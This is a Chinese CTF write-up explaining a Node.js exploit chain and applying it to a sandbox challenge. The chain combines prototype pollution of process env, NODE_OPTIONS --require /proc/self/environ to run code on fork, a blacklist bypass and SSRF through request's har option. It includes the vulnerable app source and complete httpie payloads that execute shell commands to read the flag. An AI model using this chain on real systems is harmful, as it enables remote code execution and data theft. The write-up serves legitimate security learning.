Node 从8.0 开始支持 NODE_OPTIONS,而 Node 的参数中有一项名为 --require,可以加载执行一段 JavaScript 代码。这就是一切的起源。
ToC
当 NODE_OPTIONS 遇到 fork
我们先来看一下 child_process.fork 的源码:
function fork(modulePath /* , args, options */) { validateString(modulePath, "modulePath");
// Get options and args arguments. let execArgv; let options = {}; let args = []; let pos = 1; if (pos < arguments.length && ArrayIsArray(arguments[pos])) { args = arguments[pos++]; }
if ( pos < arguments.length && (arguments[pos] === undefined || arguments[pos] === null) ) { pos++; }
if (pos < arguments.length && arguments[pos] != null) { if (typeof arguments[pos] !== "object") { throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]); }
options = { ...arguments[pos++] }; }
// Prepare arguments for fork: execArgv = options.execArgv || process.execArgv;
if (execArgv === process.execArgv && process._eval != null) { const index = execArgv.lastIndexOf(process._eval); if (index > 0) { // Remove the -e switch to avoid fork bombing ourselves. execArgv = execArgv.slice(); execArgv.splice(index - 1, 2); } }
args = execArgv.concat([modulePath], args);
if (typeof options.stdio === "string") { options.stdio = stdioStringToArray(options.stdio, "ipc"); } else if (!ArrayIsArray(options.stdio)) { // Use a separate fd=3 for the IPC channel. Inherit stdin, stdout, // and stderr from the parent if silent isn't set. options.stdio = stdioStringToArray( options.silent ? "pipe" : "inherit", "ipc" ); } else if (!options.stdio.includes("ipc")) { throw new ERR_CHILD_PROCESS_IPC_REQUIRED("options.stdio"); }
options.execPath = options.execPath || process.execPath; options.shell = false;
return spawn(options.execPath, args, options);}看到第 52 行。当 options 中没有 execPath 中,fork 会尝试使用 process.execPath,也就是 node 本身。如果我们还可以控制 options.env,那就可以在 fork 执行之前先执行一段我们想要执行的代码。
原型链注入
原型链注入是老生长谈的 Node 安全漏洞了。这次,我们需要通过它写入 env,以在 fork 时传入环境变量。
通过注入 __proto__.env,向其中写入:
{ "NODE_OPTIONS": "--require path/to/file.js"}我们就可以执行对应的 JavaScript 了。那如果不能借助文件,我们又该怎么办呢?
/proc
通过 /proc/self/environ,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload 修改成下面的形式:
{ "AAAA": "console.log("2333")//", "NODE_OPTIONS": "--require /proc/self/environ"}就可以在 fork 之前向控制台打印出 2333 了。这里的 AAAA 是为了让这条环境变量在 /proc/self/environ 中能显示在最前,而后面的 // 则是为了注释掉之后的内容,防止执行出现问题。AAAA 和 // 的配合使得只有我们希望的代码被执行,提高了破坏力。
实战
这题
const express = require("express");const bodyParser = require("body-parser");const proc = require("child_process");const request = require("request");const ip = require("ip");const manage = require("./manage.js");const path = require("path");
const app = express();app.use(bodyParser.urlencoded({ extended: true }));app.use(bodyParser.json());
app.use(express.static(path.join(__dirname, "public")));
//stop hackersconst disallowedKeys = [ "__proto__", "prototype", "constructor", "eval", "proccess", "root", "global", "exec", "!", "fs",];
function isValidPath(segment) { disallowedKeys.forEach(evilWord => { if (segment.toString().indexOf(evilWord) !== -1) { return false; } });
return true;}
app.post("/add", (req, res) => { let ip = req.ip; console.log(ip.m); if (ip.substr(0, 7) == "::ffff:") { ip = ip.substr(7); } console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`);
if (ip != "127.0.0.1" && ip != server_ip) { res.status(403).send("Not Edit from Local!"); } else { if (req.body.userName && req.body.nameVal) { let username = req.body.userName; let nameVal = req.body.nameVal;
if (!isValidPath(username) || !isValidPath(nameVal)) { username = "username"; nameVal = "guest"; }
manage.set(object, username, nameVal); console.log(ip.k); console.log(object);
res.send(` <h1>Edit Success</h1> <a href="/admin">View Admin Page</a>`); } else { res.send("param error"); } }});
app.get("/admin", (req, res) => { if (manage.get(object, "username", "guest") === "admin") { console.log("Current User:" + object.username);
const child = proc.fork(`${__dirname}/public/user.js`, ["admin"]); child.on("message", body => { res.status(200).send(body); }); child.on("close", (code, signal) => { console.log(`subproccess ended with ${signal}`); }); } else { res.status(403).send("Only Admin Can View this"); }});
app.get("/getContent", (req, res) => { res.sendfile(`${__dirname}/public/guest.html`);});
app.get("/", (req, res) => { // console.log(req.body) let uri = req.query.url ? req.query.url : "http://127.0.0.1:3000/getContent"; console.log(uri);
try { request.get(uri, (err, response, data) => { if (!err && response.statusCode == 200) { res.send(data); } else { console.log(err); } }); } catch (e) { console.log(e); } finally { console.log("Make Server Continue Running"); }});
var object = { username: "guest" };var server_ip = ip.address();
app.listen(3002);console.log(`${server_ip} is starting at port 3000`);const isObj = require("is-obj");
var manage = { getPathSegments: function (path) { const pathArray = path.split("."); const parts = [];
for (let i = 0; i < pathArray.length; i++) { let p = pathArray[i];
while (p[p.length - 1] === "\\" && pathArray[i + 1] !== undefined) { p = p.slice(0, -1); p += pathArray[++i]; }
parts.push(p); }
return parts; },
get: function (object, path, value) { if (!isObj(object) || typeof path !== "string") { return value === undefined ? object : value; }
const pathArray = this.getPathSegments(path);
for (let i = 0; i < pathArray.length; i++) { if (!Object.prototype.propertyIsEnumerable.call(object, pathArray[i])) { return value; }
object = object[pathArray[i]];
if (object === undefined || object === null) { if (i !== pathArray.length - 1) { return value; } break; } }
return object; },
set: function (object, path, value) { Object.keys(Object.prototype).forEach(function (Val) { if (!Object.hasOwnProperty(Val)) { delete Object.prototype[Val]; console.log(`${Val} is delete`); } });
if (!isObj(object) || typeof path !== "string") { return object; }
const root = object; const pathArray = this.getPathSegments(path);
for (let i = 0; i < pathArray.length; i++) { const p = pathArray[i];
if (!isObj(object[p])) { object[p] = {}; }
if (i === pathArray.length - 1) { object[p] = value; }
object = object[p]; }
return root; },};
module.exports = manage;可以看到,manager.js 中 set 存在明显的原型链注入,而通过 getPathSegments 又可以以 \\. 的方式绕过黑名单的检测。
我们发现,修改信息只能通过 /add 进行,这里有一个内网限定访问,可以使用 request 的 har 来实现:
http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'然后执行写入要执行的代码:
http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'最后访问 /admin 就可以了。